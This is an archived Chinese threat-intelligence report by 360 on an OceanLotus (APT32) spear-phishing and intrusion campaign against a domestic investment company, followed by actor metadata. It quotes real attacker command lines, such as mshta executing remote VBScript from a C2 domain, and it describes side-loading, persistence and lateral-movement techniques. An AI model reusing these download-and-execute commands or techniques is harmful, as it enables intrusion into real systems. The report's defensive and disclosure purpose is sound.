{
	"id": "6d0d1e97-600d-46c0-a851-a75dfde2ba16",
	"created_at": "2026-04-06T00:15:02.017185Z",
	"updated_at": "2026-04-10T03:36:21.93853Z",
	"deleted_at": null,
	"sha1_hash": "7507a0820eb04bbefa5400a220b3858b2fe58333",
	"title": "海莲花APT团伙针对国内大型投资公司的攻击活动分析 | 码农网",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 437970,
	"plain_text": "海莲花APT团伙针对国内大型投资公司的攻击活动分析 | 码农网\r\nArchived: 2026-04-05 16:07:57 UTC\r\n引言\r\n360威胁情报中心在近期对海莲花组织的持续跟踪过程中，发现其最新的攻击活动中使用的初始投放载荷\r\n文件和攻击利用技术与过去相比出现了一些新的变化，其近期的攻击目标包括国内某大型投资公司。\r\n本报告对海莲花组织最新的攻击利用技术，攻击载荷，攻击事件的分析和披露，其主要发现如下：\r\n该组织使用多种技术实现初始投放的载荷，并发现其使用的一种未公开的Word文档在野利用技\r\n术；\r\n该组织针对多个正常应用程序实现的白利用木马；\r\n初始投放\r\n海莲花组织依旧采用其惯用的鱼叉邮件攻击目标人员，并诱导其下载和执行相关诱导载荷文件。我们发\r\n现其近期利用亚马逊云托管相关的投放载荷文件，并在鱼叉邮件中附上云附件诱导目标人员点击下载。\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n诱导文件名称列表如下：\r\n2018年工作报告提纲2(第四稿).rar\r\n2018年工作报告提纲2(第四稿).zip\r\n2019年加薪及任命决定征求意见表.rar\r\n2019年加薪及任命决定征求意见表.zip\r\n2018106各部门周报以及汇总.rar\r\n请尽快补充完善《财务部之报告》.rar\r\n结合攻击目标、攻击时间及诱导文件名称，我们认为这可能是海莲花组织针对国内部分目标企业(如民营\r\n企业)的财务部门，企业部门管理人员和高管的发起的鱼叉攻击，由于时近年末，该组织采用了一些如部\r\n门工作总结、财务报告、人员加薪任命为诱导文件名称。\r\n初始投放的诱导文件都是以zip或rar格式的压缩文件，其中包含的初始投放载荷呈多种利用形态，以下为\r\n具体的分析。\r\nHTA文件\r\nhttps://www.codercto.com/a/46729.html\r\nPage 1 of 11\n\n海莲花组织利用开源CACTUSTORCH框架[1]生成的名为“2018106各部门周报以及汇总.docx.hta”的HTA文\r\n件。\r\nCACTUSTORCH框架是一个开源的JavaScript和VBScriptshellcode执行框架，海莲花组织基于该框架修\r\n改，并加入了代码混淆和另外的一些利用技巧。\r\n例如对CreateObject的包裹混淆实现：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\nChin函数会首先判断操作系统中安装的.NET版本，不同的版本加载不同的注入DLL版本：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n对base64编码信息的混淆变换：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n进行base64解码：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n然后反序列化之后执行代码：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n其中通过对Base64的数据解密如下：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n其中包含一个C#实现的DLL (md5:b28c80ca9a3b7deb09b275af1076eb55)。该DLL主要是解密hta文件内容中\r\n的附加数据，并在内存中加载。其中被加载的DLL，从36361位置开始读取数据。\r\n其中加载函数的参数说明如下：\r\nX(279045859 , 36361 , 30 , 1639151 )\r\n参数1：hta附加数据的解密密钥\r\n参数2：hta附加数据的偏移\r\n参数3：docx文件名的长度\r\n参数4：从hta附加数据解密后的文件中，docx文件所在的文件偏移\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n替换掉” ”，”. ”，”,”为合法的base64字符（= / +）：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\nhttps://www.codercto.com/a/46729.html\r\nPage 2 of 11\n\n然后做base64解码，再做异或解密，传进来的密钥为：279045859 （0x10A1E6E3）\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n解密后的数据如下，其中包含附加的docx文件和文件名。\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n其将docx文件释放到temp并打开：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n同时后台会执行loader程序，其为Denis家族。下图为shellcode入口：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\nLNK文件\r\n海莲花组织将LNK文件伪装成如“2018年工作报告提纲2(第四稿).doc.lnk”的名称，其图标如下：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析 该快捷方式会通过mshta执行一个远程脚本，命\r\n令行如下：\r\nC:\\Windows\\System32\\mshta.exe vbscript:Close(Execute(\"OnError ResumeNext:GetObject(\"\"script:https://\r\n其中vbb.jpg是一个hta的文件，首先通过读取注册表\r\nHKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\的路径是否存在，如果不存在的话，就为.NET\r\n2.0的版本：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n设置计划任务在30s后执行%appdata%\\\\mobsync.exe，每1h执行一次。\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n修改注册表键值，劫持SyncCenter.dll，当mobsync.exe进程启动时加载该DLL实现持久性：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n最终直接执行shellcode代码：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\nSFX文件\r\nhttps://www.codercto.com/a/46729.html\r\nPage 3 of 11\n\n在分析过程中，我们还发现了一个自解压文件格式的投放文件。其自解压的时候会通过regsvr32加载压缩\r\n包里的ocx文件，同时打开Report.docx文件。\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n打开的模糊doc文档如下：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\nocx加载后会在C:\\ProgramFiles\\NLS_000001释放四个文件，并使用白利用技术加载同目录下的\r\ndbghelp.dll：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n其中加载的恶意代码是海莲花常用的Denis木马。\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n木马连接的C2为\r\nnnggmpggmeggidggjlggmmggmiggnkggmlggjkggmhggmlggmiggjoggmcgg.ijmlajjp.karelbecker.com。\r\n内嵌VSTO的在野攻击\r\n在投放的诱导压缩包“2018年工作报告提纲2(第四稿).rar”中所包含的docx文档使用了一种似乎目前尚未公\r\n开披露的在野攻击技术。\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n文档打开后，会弹出确认框。\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n其利用文档内嵌VisualStudio Tools for Office（VSTO）进行攻击。VSTO是新版Office中COM加载项的替代\r\n品（虽然后者仍然受支持）。但是，与COM加载项不同，VSTO需要安装特殊的运行时，默认情况下不会\r\n安装。\r\n这里提及了往word文档添加外部vsto文件的方法[2]。\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n下图为诱导文档指向的vsto文件目录：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n其指向的目录如下，值得说明的是，这个目录下问的目录及文件已经全部进行了系统文件隐藏处理，正\r\n常将其解压并不能看见该目录以及文件的存在。\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\nhttps://www.codercto.com/a/46729.html\r\nPage 4 of 11\n\n其中 vsto文件首先调用Microsoft.Office.Compatible.dll\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n加载Microsoft.Office.Compatible.dll后，会分别执行两个函数，method_1主要为了执行木马，method_2主\r\n要为了打开文档文件。\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n两个函数均会通过method_0来获取customXml目录下的item1.xml和item2.xml来创建可执行文件，其通过获\r\n取对应的res编号来读取xml中的数据，并进行base64解码。\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\nmethod_1主要是通过读取item1.xml的数据并解码，然后便开始创建进程并运行。\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n最后运行的Denis木马，回连C\u0026C为\r\nnnggmpggmeggidggmiggjmggmbggjjggjmggmiggmkggnjggngggmeggmhgg.ijmlajjb.sorensanger.xyz。\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\nmethod_2创建一个随机名称的docx文件，并将从item2.xml读取的数据进行解码后写入该文件，实际上该\r\n段数据为原来的word文件内容。\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n最后会将customXMLPart删除，也就是将原来涉及的调用vsto文件的xml进行删除操作，并对一些目录进\r\n行删除。其为了进行攻击痕迹抹除，并且试图将样本伪装成正常样本，逃避检测。\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n白利用木马\r\n在分析过程中，我们发现海莲花组织使用多个白利用木马，并用于针对某大型民营投资公司的攻击事件\r\n中。\r\nUxTheme.dll - Flash白利用\r\n该DLL样本是Flash.exe的白利用文件，其编译时间为2018年10月9日，是攻击者最初使用的版本。\r\n其使用base64编码附带的数据，如图：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\nhttps://www.codercto.com/a/46729.html\r\nPage 5 of 11\n\n然后执行如下图的shellcode地址：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n0xfc8偏移处的数据传入sub_18函数里：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n获取kernel32的基址：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n获取一些基本函数的地址：\r\n1、  VirtualAlloc\r\n2、  VirtualFree\r\n3、  VirtualProtect\r\n4、  memcpy\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n其在内存中执行释放的H1g9Fjt5m.exe，并使用如下的调用参数：\r\nC:\\Users\\Administrator\\Desktop\\api\\temp\\royal\\H1g9Fjt5m.exe -u https://ristineho.com/vii32.png\r\n该PE文件的入口处会判断命令行参数中-u后面的URL，然后发送http请求，如图：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n并执行返回的数据：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\ngoopdate.dll - Google白利用\r\n针对Google的白利用和Flash白利用采用了同样的方法执行shellcode，如图：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\nshellcode解密后，发现是混淆后的并且附加的数据被加密，而Flash白利用的版本附加的PE文件数据是没\r\n有加密，所以可以推断该版本是Flash白利用的更新版本。\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n结合360威胁情报数据，我们发现了三个使用Google的白利用木马，根据编译时间，木马程序被编译了3\r\n次，相关文件信息如下：\r\nhttps://www.codercto.com/a/46729.html\r\nPage 6 of 11\n\nmd5 文件名 编译时间\r\n8176c85aa398654ae3ef091c965dd088 goopdate.dll 2018/10/9 11:35\r\nf98d7f9f6f34e8c13c905cb9c718a4ed goopdate.dll 2018/10/9 13:31\r\nc51b86fe9511d22187b114fa3b6dc44a goopdate.dll 2018/10/9 13:54\r\n攻击者连续编译三个版本的原因是植入的木马载荷被主机上的360防护  软件查杀，所以最终攻击者放弃\r\n使用该类白利用技术，而使用了360tray的白利用。\r\n软件\r\nwwlib.dll - Word白利用\r\nWord白利用木马入口为其导出函数FMain：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n其首先获取tmp目录之后拼接文件路径：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n将dll中的附加数据写入到文件中，这里数据大小为0x1E1C00 (1973248)，其实际为一个诱导的文档文件：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n随后打开文档：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n打开的文档文件界面如下：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n随后在内存的shellcode解密并重定位之后会再解密出一段shellcode用来执行：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n解密出的第二段shellcode：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析 通过创建线程执行来shellcode：\r\nhttps://www.codercto.com/a/46729.html\r\nPage 7 of 11\n\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n线程中申请一块内存释放出一个PE文件：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n释放出的PE文件：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n内存加载并调用其OEP：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n最终调用该PE文件的main函数，并执行脚本：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n脚本执行命令为：\"C:\\Windows\\System32\\mshta.exevbscript:Close(Execute(\"On Error Resume Next :\r\nGetObject(\"\"script:https://ristineho.com/vbbb.png\"\")\"))\"\r\ndbghelp.dll - 360tray白利用\r\n该DLL木马入口会先判断加载其自身的进程是不是360tray.exe，如果不是的话，则退出：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n如果是的话会读取c:\\windows\\system.ini的第一个字节当成异或密钥：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n这里是“;”符号：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n然后通过密钥解密资源中的字符串，资源中的文件如下图：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n解密后是360tray.exe\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n读取shellcode加密的文件rns1daba.wmf，然后通过解密后异或“;”解密，然后分配可执行的内存空间，把解\r\n密后的数据写入内存，如图：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\nhttps://www.codercto.com/a/46729.html\r\nPage 8 of 11\n\n然后在内存中找到自己的.text（代码段）的地址，如果找不到，就会查找safemon.dll（360应用的DLL）的\r\n代码段的地址，传到shellcode里当参数用，执行shellcode：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n该shellcode是CobaltStrike的模块，C2地址为support.erryarks.com，110.10.178.22。\r\n相关攻击事件\r\n在分析海莲花的最新攻击技术过程中，我们发现了海莲花组织在10月初针对国内某个大型投资公司的攻\r\n击事件，从攻击目标的选择来看，与海莲花过去主要以海事情报收集的攻击意图出现了变化。\r\n我们结合360威胁情报数据，还原了攻击者的整个攻击过程。\r\n攻击入口\r\n攻击者向多家目标企业人员发送了鱼叉邮件，其中附带了包含LNK文件的压缩包，其命名为“附件：报告\r\n综合各处室领导意见和要求综合稿.zip”。\r\nLNK文件执行的命令为：vbscript:Close(Execute(\"On Error\r\nResumeNext:GetObject(\"\"script:https://ri\"\u0026\"stineho.com/vb\"\u0026\"b.jpg\"\")\"))。可以发现其与我们发现的亚马逊\r\n云上的LNK文件投放使用的同一下载链接。\r\n其中下载的jpg文件实际为HTA文件，并通过劫持微软的mobsync.exe进程默认加载的CLSID键值实现执行\r\n模块的持久性。\r\n初始植入\r\n攻击者利用Flash白利用加载初始植入木马，并创建计划任务。后续更新为Google白利用版本。\r\n攻击者利用CACTUSTORCH框架生成的Javascript载荷运行shellcode，并将白利用木马更新为使用360tray\r\n白利用加载。\r\n内网探测\r\n利用nbt.exe扫描内网网段，其可能通过收集凭据信息或暴力破解内网网络共享的用户和密码，并通过net\r\nuser等相关命令查看或访问内网主机。\r\n横向移动\r\n攻击者通过渗透内网关键服务器主机，并向其他目标机器下发了木马文件，其通过PowerShell下载和执行\r\n相关木马文件，这里同样利用了360tray白利用木马，并创建计划任务。\r\n在分析的过程中，还发现攻击者在横向移动过程中下发了一个命名为360Update.bat 的批处理脚本。从脚\r\n本内容可以发现其实际用于解码一个 JS 脚本并执行。\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\nhttps://www.codercto.com/a/46729.html\r\nPage 9 of 11\n\nJS 脚本中字符串的解密算法为RC4算法，如图：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n解密后其中的代码如图，为一个.Net 模块：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n通过JS调用Xor(__0x4222416B,__0x00720445, __0x16292B37)解密后续载荷文件：\r\n第一个参数：待解密的base64的数据\r\n第二个参数：fuckyou@360（解密密钥）\r\n第三个参数：WQoH8Ijy/lUUjmTDmxCj6g==（59 0a 07 f088 f2 fe 55 14 8e 64 c3 9b 10 a3 ea）（解密后的\r\nhash）\r\n解密后的载荷文件如下：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n其解密为一个beacon组件，配置文件如下：\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n关联分析\r\n根据木马中内嵌的PDB信息：\r\nC:\\Users\\Meister\\Documents\\Projects\\BrokenShield\\Bin\\x86\\Release\\BrokenShield.pdb\r\n我们发现了多个木马样本文件，并且通过VirusTotal平台发现其上传来源于越南。\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n总结\r\nAPT攻击者总是在不停的变换其攻击的手法，以达到绕过攻击目标的安全防护。其可以利用受害目标人员\r\n的安全意识，也通过不断研究和更新其攻击的战术技术。下图总结了海莲花组织使用的多种投放和攻击\r\n利用方式。\r\n海莲花APT团伙针对国内大型投资公司的攻击活动分析\r\n通过本报告的相关分析和披露，可以看出“海莲花”组织始终保持持续的更新和变化其攻击手法以提高攻击\r\n成功的效率。其利用多样化的攻击投放载荷，针对多种程序的白利用技术以及使用开源攻击 工具 用于攻\r\nhttps://www.codercto.com/a/46729.html\r\nPage 10 of 11\n\n击活动中已经成为其新的攻击技术特点。\r\nIOC\r\nsorensanger.xyz\r\nsupport.erryarks.com\r\n110.10.178.22\r\nhttps://ristineho.com/vbbb.png\r\nhttps://ristineho.com/ldl32.jpg\r\nhttps://ristineho.com/iyts6.png\r\n7a36e9428b28b8db14adcfa798b24c8a\r\n8176c85aa398654ae3ef091c965dd088\r\ne04594ba7e2c63d4f48d92cc99246cce\r\n6331ae1199890dcac2f66d89d4f1aa48\r\nC:\\Users\\Meister\\Documents\\Projects\\BrokenShield\\Bin\\x86\\Release\\BrokenShield.pdb\r\n参考链接\r\n1. https://github.com/mdsecactivebreach/CACTUSTORCH\r\n2. https://docs.microsoft.com/zh-cn/visualstudio/vsto/how-to-add-custom-xml-parts-to-documents-by-using-vsto-add-ins?view=vs-2017\r\n3. https://ti.360.net/blog/articles/oceanlotus-targets-chinese-university/\r\n声明：本文来自360威胁情报中心，版权归作者所有。文章内容仅代表作者独立观点，不代表安全内参立\r\n场，转载目的在于传递更多信息。如需转载，请联系原作者获取授权。\r\nSource: https://www.codercto.com/a/46729.html\r\nhttps://www.codercto.com/a/46729.html\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "ZH",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://www.codercto.com/a/46729.html"
	],
	"report_names": [
		"46729.html"
	],
	"threat_actors": [
		{
			"id": "af509bbb-8d18-4903-a9bd-9e94099c6b30",
			"created_at": "2023-01-06T13:46:38.585525Z",
			"updated_at": "2026-04-10T02:00:03.030833Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"OceanLotus",
				"ATK17",
				"G0050",
				"APT-C-00",
				"APT-32",
				"Canvas Cyclone",
				"SeaLotus",
				"Ocean Buffalo",
				"OceanLotus Group",
				"Cobalt Kitty",
				"Sea Lotus",
				"APT 32",
				"POND LOACH",
				"TIN WOODLAWN",
				"Ocean Lotus"
			],
			"source_name": "MISPGALAXY:APT32",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "870f6f62-84f5-48ca-a18e-cf2902cd6924",
			"created_at": "2022-10-25T15:50:23.303818Z",
			"updated_at": "2026-04-10T02:00:05.301184Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"APT32",
				"SeaLotus",
				"OceanLotus",
				"APT-C-00",
				"Canvas Cyclone"
			],
			"source_name": "MITRE:APT32",
			"tools": [
				"Mimikatz",
				"ipconfig",
				"Kerrdown",
				"Cobalt Strike",
				"SOUNDBITE",
				"OSX_OCEANLOTUS.D",
				"KOMPROGO",
				"netsh",
				"RotaJakiro",
				"PHOREAL",
				"Arp",
				"Denis",
				"Goopy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "5da6b5fd-1955-412a-81aa-069fb50b6e31",
			"created_at": "2025-08-07T02:03:25.116085Z",
			"updated_at": "2026-04-10T02:00:03.668978Z",
			"deleted_at": null,
			"main_name": "TIN WOODLAWN",
			"aliases": [
				"APT32 ",
				"Cobalt Kitty",
				"OceanLotus",
				"WOODLAWN "
			],
			"source_name": "Secureworks:TIN WOODLAWN",
			"tools": [
				"Cobalt Strike",
				"Denis",
				"Goopy",
				"JEShell",
				"KerrDown",
				"Mimikatz",
				"Ratsnif",
				"Remy",
				"Rizzo",
				"RolandRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2439ad53-39cc-4fff-8fdf-4028d65803c0",
			"created_at": "2022-10-25T16:07:23.353204Z",
			"updated_at": "2026-04-10T02:00:04.55407Z",
			"deleted_at": null,
			"main_name": "APT 32",
			"aliases": [
				"APT 32",
				"APT-C-00",
				"APT-LY-100",
				"ATK 17",
				"G0050",
				"Lotus Bane",
				"Ocean Buffalo",
				"OceanLotus",
				"Operation Cobalt Kitty",
				"Operation PhantomLance",
				"Pond Loach",
				"SeaLotus",
				"SectorF01",
				"Tin Woodlawn"
			],
			"source_name": "ETDA:APT 32",
			"tools": [
				"Agentemis",
				"Android.Backdoor.736.origin",
				"AtNow",
				"Backdoor.MacOS.OCEANLOTUS.F",
				"BadCake",
				"CACTUSTORCH",
				"CamCapture Plugin",
				"CinaRAT",
				"Cobalt Strike",
				"CobaltStrike",
				"Cuegoe",
				"DKMC",
				"Denis",
				"Goopy",
				"HiddenLotus",
				"KOMPROGO",
				"KerrDown",
				"METALJACK",
				"MSFvenom",
				"Mimikatz",
				"Nishang",
				"OSX_OCEANLOTUS.D",
				"OceanLotus",
				"PHOREAL",
				"PWNDROID1",
				"PhantomLance",
				"PowerSploit",
				"Quasar RAT",
				"QuasarRAT",
				"RatSnif",
				"Remy",
				"Remy RAT",
				"Rizzo",
				"Roland",
				"Roland RAT",
				"SOUNDBITE",
				"Salgorea",
				"Splinter RAT",
				"Terracotta VPN",
				"Yggdrasil",
				"cobeacon",
				"denesRAT",
				"fingerprintjs2"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434502,
	"ts_updated_at": 1775792181,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7507a0820eb04bbefa5400a220b3858b2fe58333.pdf",
		"text": "https://archive.orkl.eu/7507a0820eb04bbefa5400a220b3858b2fe58333.txt",
		"img": "https://archive.orkl.eu/7507a0820eb04bbefa5400a220b3858b2fe58333.jpg"
	}
}